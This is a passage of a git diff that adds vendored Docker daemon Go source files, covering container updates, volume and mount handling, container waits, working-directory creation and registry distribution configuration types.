+
+	return container.ContainerUpdateOKBody{Warnings: warnings}, nil
+}
+
+// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID.
+func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error {
+	if len(cmd) == 0 {
+		return nil
+	}
+	c, err := daemon.GetContainer(cID)
+	if err != nil {
+		return err
+	}
+	c.Path = cmd[0]
+	c.Args = cmd[1:]
+	return nil
+}
+
+func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error {
+	if hostConfig == nil {
+		return nil
+	}
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	restoreConfig := false
+	backupHostConfig := *container.HostConfig
+	defer func() {
+		if restoreConfig {
+			container.Lock()
+			container.HostConfig = &backupHostConfig
+			container.ToDisk()
+			container.Unlock()
+		}
+	}()
+
+	if container.RemovalInProgress || container.Dead {
+		return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\"."))
+	}
+
+	if err := container.UpdateContainer(hostConfig); err != nil {
+		restoreConfig = true
+		return errCannotUpdate(container.ID, err)
+	}
+
+	// if Restart Policy changed, we need to update container monitor
+	if hostConfig.RestartPolicy.Name != "" {
+		container.UpdateMonitor(hostConfig.RestartPolicy)
+	}
+
+	// If container is not running, update hostConfig struct is enough,
+	// resources will be updated when the container is started again.
+	// If container is running (including paused), we need to update configs
+	// to the real world.
+	if container.IsRunning() && !container.IsRestarting() {
+		if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil {
+			restoreConfig = true
+			return errCannotUpdate(container.ID, err)
+		}
+	}
+
+	daemon.LogContainerEvent(container, "update")
+
+	return nil
+}
+
+func errCannotUpdate(containerID string, err error) error {
+	return fmt.Errorf("Cannot update container %s: %v", containerID, err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go
new file mode 100644
index 0000000000..f422325272
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/update_linux.go
@@ -0,0 +1,25 @@
+// +build linux
+
+package daemon
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func toContainerdResources(resources container.Resources) libcontainerd.Resources {
+	var r libcontainerd.Resources
+	r.BlkioWeight = uint64(resources.BlkioWeight)
+	r.CpuShares = uint64(resources.CPUShares)
+	r.CpuPeriod = uint64(resources.CPUPeriod)
+	r.CpuQuota = uint64(resources.CPUQuota)
+	r.CpusetCpus = resources.CpusetCpus
+	r.CpusetMems = resources.CpusetMems
+	r.MemoryLimit = uint64(resources.Memory)
+	if resources.MemorySwap > 0 {
+		r.MemorySwap = uint64(resources.MemorySwap)
+	}
+	r.MemoryReservation = uint64(resources.MemoryReservation)
+	r.KernelMemoryLimit = uint64(resources.KernelMemory)
+	return r
+}
diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go
new file mode 100644
index 0000000000..f3b545c5f0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/update_solaris.go
@@ -0,0 +1,11 @@
+package daemon
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func toContainerdResources(resources container.Resources) libcontainerd.Resources {
+	var r libcontainerd.Resources
+	return r
+}
diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go b/vendor/github.com/docker/docker/daemon/update_windows.go
new file mode 100644
index 0000000000..01466260bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/update_windows.go
@@ -0,0 +1,13 @@
+// +build windows
+
+package daemon
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func toContainerdResources(resources container.Resources) libcontainerd.Resources {
+	var r libcontainerd.Resources
+	return r
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go
new file mode 100644
index 0000000000..10cf787709
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes.go
@@ -0,0 +1,303 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	dockererrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+var (
+	// ErrVolumeReadonly is used to signal an error when trying to copy data into
+	// a volume mount that is not writable.
+	ErrVolumeReadonly = errors.New("mounted volume is marked read-only")
+)
+
+type mounts []container.Mount
+
+// volumeToAPIType converts a volume.Volume to the type used by the Engine API
+func volumeToAPIType(v volume.Volume) *types.Volume {
+	tv := &types.Volume{
+		Name:   v.Name(),
+		Driver: v.DriverName(),
+	}
+	if v, ok := v.(volume.DetailedVolume); ok {
+		tv.Labels = v.Labels()
+		tv.Options = v.Options()
+		tv.Scope = v.Scope()
+	}
+
+	return tv
+}
+
+// Len returns the number of mounts. Used in sorting.
+func (m mounts) Len() int {
+	return len(m)
+}
+
+// Less returns true if the number of parts (a/b/c would be 3 parts) in the
+// mount indexed by parameter 1 is less than that of the mount indexed by
+// parameter 2. Used in sorting.
+func (m mounts) Less(i, j int) bool {
+	return m.parts(i) < m.parts(j)
+}
+
+// Swap swaps two items in an array of mounts. Used in sorting
+func (m mounts) Swap(i, j int) {
+	m[i], m[j] = m[j], m[i]
+}
+
+// parts returns the number of parts in the destination of a mount. Used in sorting.
+func (m mounts) parts(i int) int {
+	return strings.Count(filepath.Clean(m[i].Destination), string(os.PathSeparator))
+}
+
+// registerMountPoints initializes the container mount points with the configured volumes and bind mounts.
+// It follows the next sequence to decide what to mount in each final destination:
+//
+// 1. Select the previously configured mount points for the containers, if any.
+// 2. Select the volumes mounted from another containers. Overrides previously configured mount point destination.
+// 3. Select the bind mounts set by the client. Overrides previously configured mount point destinations.
+// 4. Cleanup old volumes that are about to be reassigned.
+func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) {
+	binds := map[string]bool{}
+	mountPoints := map[string]*volume.MountPoint{}
+	defer func() {
+		// clean up the container mountpoints once return with error
+		if retErr != nil {
+			for _, m := range mountPoints {
+				if m.Volume == nil {
+					continue
+				}
+				daemon.volumes.Dereference(m.Volume, container.ID)
+			}
+		}
+	}()
+
+	// 1. Read already configured mount points.
+	for destination, point := range container.MountPoints {
+		mountPoints[destination] = point
+	}
+
+	// 2. Read volumes from other containers.
+	for _, v := range hostConfig.VolumesFrom {
+		containerID, mode, err := volume.ParseVolumesFrom(v)
+		if err != nil {
+			return err
+		}
+
+		c, err := daemon.GetContainer(containerID)
+		if err != nil {
+			return err
+		}
+
+		for _, m := range c.MountPoints {
+			cp := &volume.MountPoint{
+				Name:        m.Name,
+				Source:      m.Source,
+				RW:          m.RW && volume.ReadWrite(mode),
+				Driver:      m.Driver,
+				Destination: m.Destination,
+				Propagation: m.Propagation,
+				Spec:        m.Spec,
+				CopyData:    false,
+			}
+
+			if len(cp.Source) == 0 {
+				v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID)
+				if err != nil {
+					return err
+				}
+				cp.Volume = v
+			}
+
+			mountPoints[cp.Destination] = cp
+		}
+	}
+
+	// 3. Read bind mounts
+	for _, b := range hostConfig.Binds {
+		bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver)
+		if err != nil {
+			return err
+		}
+
+		// #10618
+		_, tmpfsExists := hostConfig.Tmpfs[bind.Destination]
+		if binds[bind.Destination] || tmpfsExists {
+			return fmt.Errorf("Duplicate mount point '%s'", bind.Destination)
+		}
+
+		if bind.Type == mounttypes.TypeVolume {
+			// create the volume
+			v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil)
+			if err != nil {
+				return err
+			}
+			bind.Volume = v
+			bind.Source = v.Path()
+			// bind.Name is an already existing volume, we need to use that here
+			bind.Driver = v.DriverName()
+			if bind.Driver == volume.DefaultDriverName {
+				setBindModeIfNull(bind)
+			}
+		}
+
+		binds[bind.Destination] = true
+		mountPoints[bind.Destination] = bind
+	}
+
+	for _, cfg := range hostConfig.Mounts {
+		mp, err := volume.ParseMountSpec(cfg)
+		if err != nil {
+			return dockererrors.NewBadRequestError(err)
+		}
+
+		if binds[mp.Destination] {
+			return fmt.Errorf("Duplicate mount point '%s'", cfg.Target)
+		}
+
+		if mp.Type == mounttypes.TypeVolume {
+			var v volume.Volume
+			if cfg.VolumeOptions != nil {
+				var driverOpts map[string]string
+				if cfg.VolumeOptions.DriverConfig != nil {
+					driverOpts = cfg.VolumeOptions.DriverConfig.Options
+				}
+				v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels)
+			} else {
+				v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil)
+			}
+			if err != nil {
+				return err
+			}
+
+			if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil {
+				return err
+			}
+			mp.Volume = v
+			mp.Name = v.Name()
+			mp.Driver = v.DriverName()
+
+			// only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow
+			if cv, ok := v.(interface {
+				CachedPath() string
+			}); ok {
+				mp.Source = cv.CachedPath()
+			}
+		}
+
+		binds[mp.Destination] = true
+		mountPoints[mp.Destination] = mp
+	}
+
+	container.Lock()
+
+	// 4. Cleanup old volumes that are about to be reassigned.
+	for _, m := range mountPoints {
+		if m.BackwardsCompatible() {
+			if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil {
+				daemon.volumes.Dereference(mp.Volume, container.ID)
+			}
+		}
+	}
+	container.MountPoints = mountPoints
+
+	container.Unlock()
+
+	return nil
+}
+
+// lazyInitializeVolume initializes a mountpoint's volume if needed.
+// This happens after a daemon restart.
+func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error {
+	if len(m.Driver) > 0 && m.Volume == nil {
+		v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID)
+		if err != nil {
+			return err
+		}
+		m.Volume = v
+	}
+	return nil
+}
+
+func backportMountSpec(container *container.Container) error {
+	for target, m := range container.MountPoints {
+		if m.Spec.Type != "" {
+			// if type is set on even one mount, no need to migrate
+			return nil
+		}
+		if m.Name != "" {
+			m.Type = mounttypes.TypeVolume
+			m.Spec.Type = mounttypes.TypeVolume
+
+			// make sure this is not an anyonmous volume before setting the spec source
+			if _, exists := container.Config.Volumes[target]; !exists {
+				m.Spec.Source = m.Name
+			}
+			if container.HostConfig.VolumeDriver != "" {
+				m.Spec.VolumeOptions = &mounttypes.VolumeOptions{
+					DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver},
+				}
+			}
+			if strings.Contains(m.Mode, "nocopy") {
+				if m.Spec.VolumeOptions == nil {
+					m.Spec.VolumeOptions = &mounttypes.VolumeOptions{}
+				}
+				m.Spec.VolumeOptions.NoCopy = true
+			}
+		} else {
+			m.Type = mounttypes.TypeBind
+			m.Spec.Type = mounttypes.TypeBind
+			m.Spec.Source = m.Source
+			if m.Propagation != "" {
+				m.Spec.BindOptions = &mounttypes.BindOptions{
+					Propagation: m.Propagation,
+				}
+			}
+		}
+
+		m.Spec.Target = m.Destination
+		if !m.RW {
+			m.Spec.ReadOnly = true
+		}
+	}
+	return container.ToDiskLocking()
+}
+
+func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error {
+	localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName)
+	if err != nil {
+		return fmt.Errorf("can't retrieve local volume driver: %v", err)
+	}
+	vols, err := localVolumeDriver.List()
+	if err != nil {
+		return fmt.Errorf("can't retrieve local volumes: %v", err)
+	}
+
+	for _, v := range vols {
+		name := v.Name()
+		_, err := daemon.volumes.Get(name)
+		if err != nil {
+			logrus.Warnf("failed to retrieve volume %s from store: %v", name, err)
+		}
+
+		err = fn(v)
+		if err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go
new file mode 100644
index 0000000000..450d17f978
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go
@@ -0,0 +1,39 @@
+package daemon
+
+import (
+	"testing"
+
+	"github.com/docker/docker/volume"
+)
+
+func TestParseVolumesFrom(t *testing.T) {
+	cases := []struct {
+		spec    string
+		expID   string
+		expMode string
+		fail    bool
+	}{
+		{"", "", "", true},
+		{"foobar", "foobar", "rw", false},
+		{"foobar:rw", "foobar", "rw", false},
+		{"foobar:ro", "foobar", "ro", false},
+		{"foobar:baz", "", "", true},
+	}
+
+	for _, c := range cases {
+		id, mode, err := volume.ParseVolumesFrom(c.spec)
+		if c.fail {
+			if err == nil {
+				t.Fatalf("Expected error, was nil, for spec %s\n", c.spec)
+			}
+			continue
+		}
+
+		if id != c.expID {
+			t.Fatalf("Expected id %s, was %s, for spec %s\n", c.expID, id, c.spec)
+		}
+		if mode != c.expMode {
+			t.Fatalf("Expected mode %s, was %s for spec %s\n", c.expMode, mode, c.spec)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go
new file mode 100644
index 0000000000..29dffa9ea0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go
@@ -0,0 +1,219 @@
+// +build !windows
+
+// TODO(amitkris): We need to split this file for solaris.
+
+package daemon
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/pkg/errors"
+)
+
+// setupMounts iterates through each of the mount points for a container and
+// calls Setup() on each. It also looks to see if is a network mount such as
+// /etc/resolv.conf, and if it is not, appends it to the array of mounts.
+func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) {
+	var mounts []container.Mount
+	// TODO: tmpfs mounts should be part of Mountpoints
+	tmpfsMounts := make(map[string]bool)
+	tmpfsMountInfo, err := c.TmpfsMounts()
+	if err != nil {
+		return nil, err
+	}
+	for _, m := range tmpfsMountInfo {
+		tmpfsMounts[m.Destination] = true
+	}
+	for _, m := range c.MountPoints {
+		if tmpfsMounts[m.Destination] {
+			continue
+		}
+		if err := daemon.lazyInitializeVolume(c.ID, m); err != nil {
+			return nil, err
+		}
+		rootUID, rootGID := daemon.GetRemappedUIDGID()
+		path, err := m.Setup(c.MountLabel, rootUID, rootGID)
+		if err != nil {
+			return nil, err
+		}
+		if !c.TrySetNetworkMount(m.Destination, path) {
+			mnt := container.Mount{
+				Source:      path,
+				Destination: m.Destination,
+				Writable:    m.RW,
+				Propagation: string(m.Propagation),
+			}
+			if m.Volume != nil {
+				attributes := map[string]string{
+					"driver":      m.Volume.DriverName(),
+					"container":   c.ID,
+					"destination": m.Destination,
+					"read/write":  strconv.FormatBool(m.RW),
+					"propagation": string(m.Propagation),
+				}
+				daemon.LogVolumeEvent(m.Volume.Name(), "mount", attributes)
+			}
+			mounts = append(mounts, mnt)
+		}
+	}
+
+	mounts = sortMounts(mounts)
+	netMounts := c.NetworkMounts()
+	// if we are going to mount any of the network files from container
+	// metadata, the ownership must be set properly for potential container
+	// remapped root (user namespaces)
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	for _, mount := range netMounts {
+		if err := os.Chown(mount.Source, rootUID, rootGID); err != nil {
+			return nil, err
+		}
+	}
+	return append(mounts, netMounts...), nil
+}
+
+// sortMounts sorts an array of mounts in lexicographic order. This ensure that
+// when mounting, the mounts don't shadow other mounts. For example, if mounting
+// /etc and /etc/resolv.conf, /etc/resolv.conf must not be mounted first.
+func sortMounts(m []container.Mount) []container.Mount {
+	sort.Sort(mounts(m))
+	return m
+}
+
+// setBindModeIfNull is platform specific processing to ensure the
+// shared mode is set to 'z' if it is null. This is called in the case
+// of processing a named volume and not a typical bind.
+func setBindModeIfNull(bind *volume.MountPoint) {
+	if bind.Mode == "" {
+		bind.Mode = "z"
+	}
+}
+
+// migrateVolume links the contents of a volume created pre Docker 1.7
+// into the location expected by the local driver.
+// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data.
+// It preserves the volume json configuration generated pre Docker 1.7 to be able to
+// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility.
+func migrateVolume(id, vfs string) error {
+	l, err := volumedrivers.GetDriver(volume.DefaultDriverName)
+	if err != nil {
+		return err
+	}
+
+	newDataPath := l.(*local.Root).DataPath(id)
+	fi, err := os.Stat(newDataPath)
+	if err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	if fi != nil && fi.IsDir() {
+		return nil
+	}
+
+	return os.Symlink(vfs, newDataPath)
+}
+
+// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7.
+// It reads the container configuration and creates valid mount points for the old volumes.
+func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error {
+	// Inspect old structures only when we're upgrading from old versions
+	// to versions >= 1.7 and the MountPoints has not been populated with volumes data.
+	type volumes struct {
+		Volumes   map[string]string
+		VolumesRW map[string]bool
+	}
+	cfgPath, err := container.ConfigPath()
+	if err != nil {
+		return err
+	}
+	f, err := os.Open(cfgPath)
+	if err != nil {
+		return errors.Wrap(err, "could not open container config")
+	}
+	defer f.Close()
+	var cv volumes
+	if err := json.NewDecoder(f).Decode(&cv); err != nil {
+		return errors.Wrap(err, "could not decode container config")
+	}
+
+	if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 {
+		for destination, hostPath := range cv.Volumes {
+			vfsPath := filepath.Join(daemon.root, "vfs", "dir")
+			rw := cv.VolumesRW != nil && cv.VolumesRW[destination]
+
+			if strings.HasPrefix(hostPath, vfsPath) {
+				id := filepath.Base(hostPath)
+				v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil)
+				if err != nil {
+					return err
+				}
+				if err := migrateVolume(id, hostPath); err != nil {
+					return err
+				}
+				container.AddMountPointWithVolume(destination, v, true)
+			} else { // Bind mount
+				m := volume.MountPoint{Source: hostPath, Destination: destination, RW: rw}
+				container.MountPoints[destination] = &m
+			}
+		}
+		return container.ToDisk()
+	}
+	return nil
+}
+
+func (daemon *Daemon) mountVolumes(container *container.Container) error {
+	mounts, err := daemon.setupMounts(container)
+	if err != nil {
+		return err
+	}
+
+	for _, m := range mounts {
+		dest, err := container.GetResourcePath(m.Destination)
+		if err != nil {
+			return err
+		}
+
+		var stat os.FileInfo
+		stat, err = os.Stat(m.Source)
+		if err != nil {
+			return err
+		}
+		if err = fileutils.CreateIfNotExists(dest, stat.IsDir()); err != nil {
+			return err
+		}
+
+		opts := "rbind,ro"
+		if m.Writable {
+			opts = "rbind,rw"
+		}
+
+		if err := mount.Mount(m.Source, dest, bindMountType, opts); err != nil {
+			return err
+		}
+
+		// mountVolumes() seems to be called for temporary mounts
+		// outside the container. Soon these will be unmounted with
+		// lazy unmount option and given we have mounted the rbind,
+		// all the submounts will propagate if these are shared. If
+		// daemon is running in host namespace and has / as shared
+		// then these unmounts will propagate and unmount original
+		// mount as well. So make all these mounts rprivate.
+		// Do not use propagation property of volume as that should
+		// apply only when mounting happen inside the container.
+		if err := mount.MakeRPrivate(dest); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go
new file mode 100644
index 0000000000..bf7fc478a1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go
@@ -0,0 +1,47 @@
+// +build windows
+
+package daemon
+
+import (
+	"sort"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/volume"
+)
+
+// setupMounts configures the mount points for a container by appending each
+// of the configured mounts on the container to the OCI mount structure
+// which will ultimately be passed into the oci runtime during container creation.
+// It also ensures each of the mounts are lexographically sorted.
+
+// BUGBUG TODO Windows containerd. This would be much better if it returned
+// an array of runtime spec mounts, not container mounts. Then no need to
+// do multiple transitions.
+
+func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) {
+	var mnts []container.Mount
+	for _, mount := range c.MountPoints { // type is volume.MountPoint
+		if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil {
+			return nil, err
+		}
+		s, err := mount.Setup(c.MountLabel, 0, 0)
+		if err != nil {
+			return nil, err
+		}
+
+		mnts = append(mnts, container.Mount{
+			Source:      s,
+			Destination: mount.Destination,
+			Writable:    mount.RW,
+		})
+	}
+
+	sort.Sort(mounts(mnts))
+	return mnts, nil
+}
+
+// setBindModeIfNull is platform specific processing which is a no-op on
+// Windows.
+func setBindModeIfNull(bind *volume.MountPoint) {
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go
new file mode 100644
index 0000000000..2dab22e991
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/wait.go
@@ -0,0 +1,32 @@
+package daemon
+
+import (
+	"time"
+
+	"golang.org/x/net/context"
+)
+
+// ContainerWait stops processing until the given container is
+// stopped. If the container is not found, an error is returned. On a
+// successful stop, the exit code of the container is returned. On a
+// timeout, an error is returned. If you want to wait forever, supply
+// a negative duration for the timeout.
+func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return -1, err
+	}
+
+	return container.WaitStop(timeout)
+}
+
+// ContainerWaitWithContext returns a channel where exit code is sent
+// when container stops. Channel can be cancelled with a context.
+func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	return container.WaitWithContext(ctx)
+}
diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go
new file mode 100644
index 0000000000..5bd0d0caca
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/workdir.go
@@ -0,0 +1,21 @@
+package daemon
+
+// ContainerCreateWorkdir creates the working directory. This is solves the
+// issue arising from https://github.com/docker/docker/issues/27545,
+// which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix
+// was too expensive in terms of performance on Windows. Instead,
+// https://github.com/docker/docker/pull/28514 introduces this new functionality
+// where the builder calls into the backend here to create the working directory.
+func (daemon *Daemon) ContainerCreateWorkdir(cID string) error {
+	container, err := daemon.GetContainer(cID)
+	if err != nil {
+		return err
+	}
+	err = daemon.Mount(container)
+	if err != nil {
+		return err
+	}
+	defer daemon.Unmount(container)
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	return container.SetupWorkingDirectory(rootUID, rootGID)
+}
diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go
new file mode 100644
index 0000000000..bfea8b0336
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/config.go
@@ -0,0 +1,241 @@
+package distribution
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"runtime"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/libtrust"
+	"golang.org/x/net/context"
+)
+
+// Config stores configuration for communicating
+// with a registry.
+type Config struct {
+	// MetaHeaders stores HTTP headers with metadata about the image
+	MetaHeaders map[string][]string
+	// AuthConfig holds authentication credentials for authenticating with
+	// the registry.
+	AuthConfig *types.AuthConfig
+	// ProgressOutput is the interface for showing the status of the pull
+	// operation.
+	ProgressOutput progress.Output
+	// RegistryService is the registry service to use for TLS configuration
+	// and endpoint lookup.
+	RegistryService registry.Service
+	// ImageEventLogger notifies events for a given image
+	ImageEventLogger func(id, name, action string)
+	// MetadataStore is the storage backend for distribution-specific
+	// metadata.
+	MetadataStore metadata.Store
+	// ImageStore manages images.
+	ImageStore ImageConfigStore
+	// ReferenceStore manages tags. This value is optional, when excluded
+	// content will not be tagged.
+	ReferenceStore reference.Store
+	// RequireSchema2 ensures that only schema2 manifests are used.
+	RequireSchema2 bool
+}
+
+// ImagePullConfig stores pull configuration.
+type ImagePullConfig struct {
+	Config
+
+	// DownloadManager manages concurrent pulls.
+	DownloadManager RootFSDownloadManager
+	// Schema2Types is the valid schema2 configuration types allowed
+	// by the pull operation.
+	Schema2Types []string
+}
+
+// ImagePushConfig stores push configuration.
+type ImagePushConfig struct {
+	Config
+
+	// ConfigMediaType is the configuration media type for
+	// schema2 manifests.
+	ConfigMediaType string
+	// LayerStore manages layers.
+	LayerStore PushLayerProvider
+	// TrustKey is the private key for legacy signatures. This is typically
+	// an ephemeral key, since these signatures are no longer verified.
+	TrustKey libtrust.PrivateKey
+	// UploadManager dispatches uploads.
+	UploadManager *xfer.LayerUploadManager
+}
+
+// ImageConfigStore handles storing and getting image configurations
+// by digest. Allows getting an image configurations rootfs from the
+// configuration.
+type ImageConfigStore interface {
+	Put([]byte) (digest.Digest, error)
+	Get(digest.Digest) ([]byte, error)
+	RootFSFromConfig([]byte) (*image.RootFS, error)
+}
+
+// PushLayerProvider provides layers to be pushed by ChainID.
+type PushLayerProvider interface {
+	Get(layer.ChainID) (PushLayer, error)
+}
+
+// PushLayer is a pushable layer with metadata about the layer
+// and access to the content of the layer.
+type PushLayer interface {
+	ChainID() layer.ChainID
+	DiffID() layer.DiffID
+	Parent() PushLayer
+	Open() (io.ReadCloser, error)
+	Size() (int64, error)
+	MediaType() string
+	Release()
+}
+
+// RootFSDownloadManager handles downloading of the rootfs
+type RootFSDownloadManager interface {
+	// Download downloads the layers into the given initial rootfs and
+	// returns the final rootfs.
+	// Given progress output to track download progress
+	// Returns function to release download resources
+	Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error)
+}
+
+type imageConfigStore struct {
+	image.Store
+}
+
+// NewImageConfigStoreFromStore returns an ImageConfigStore backed
+// by an image.Store for container images.
+func NewImageConfigStoreFromStore(is image.Store) ImageConfigStore {
+	return &imageConfigStore{
+		Store: is,
+	}
+}
+
+func (s *imageConfigStore) Put(c []byte) (digest.Digest, error) {
+	id, err := s.Store.Create(c)
+	return digest.Digest(id), err
+}
+
+func (s *imageConfigStore) Get(d digest.Digest) ([]byte, error) {
+	img, err := s.Store.Get(image.IDFromDigest(d))
+	if err != nil {
+		return nil, err
+	}
+	return img.RawJSON(), nil
+}
+
+func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
+	var unmarshalledConfig image.Image
+	if err := json.Unmarshal(c, &unmarshalledConfig); err != nil {
+		return nil, err
+	}
+
+	// fail immediately on windows
+	if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" {
+		return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS)
+	}
+
+	return unmarshalledConfig.RootFS, nil
+}
+
+type storeLayerProvider struct {
+	ls layer.Store
+}
+
+// NewLayerProviderFromStore returns a layer provider backed by
+// an instance of LayerStore. Only getting layers as gzipped
+// tars is supported.
+func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider {
+	return &storeLayerProvider{
+		ls: ls,
+	}
+}
+
+func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) {
+	if lid == "" {
+		return &storeLayer{
+			Layer: layer.EmptyLayer,
+		}, nil
+	}
+	l, err := p.ls.Get(lid)
+	if err != nil {
+		return nil, err
+	}
+
+	sl := storeLayer{
+		Layer: l,
+		ls:    p.ls,
+	}
+	if d, ok := l.(distribution.Describable); ok {
+		return &describableStoreLayer{
+			storeLayer:  sl,
+			describable: d,
+		}, nil
+	}
+
+	return &sl, nil
+}
+
+type storeLayer struct {
+	layer.Layer
+	ls layer.Store
+}
+
+func (l *storeLayer) Parent() PushLayer {
+	p := l.Layer.Parent()
+	if p == nil {
+		return nil
+	}
+	sl := storeLayer{
+		Layer: p,
+		ls:    l.ls,
+	}
+	if d, ok := p.(distribution.Describable); ok {
+		return &describableStoreLayer{
+			storeLayer:  sl,
+			describable: d,
+		}
+	}
+
+	return &sl
+}
+
+func (l *storeLayer) Open() (io.ReadCloser, error) {
+	return l.Layer.TarStream()
+}
+
+func (l *storeLayer) Size() (int64, error) {
+	return l.Layer.DiffSize()
+}
+
+func (l *storeLayer) MediaType() string {
+	// layer store always returns uncompressed tars
+	return schema2.MediaTypeUncompressedLayer
+}
+
+func (l *storeLayer) Release() {
+	if l.ls != nil {
+		layer.ReleaseAndLog(l.ls, l.Layer)
+	}
+}
+
+type describableStoreLayer struct {
+	storeLayer
+	describable distribution.Describable
+}
+
+func (l *describableStoreLayer) Descriptor() distribution.Descriptor {
+	return l.describable.Descriptor()
+}
diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go
new file mode 100644
index 0000000000..b8cf9fb9e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/errors.go
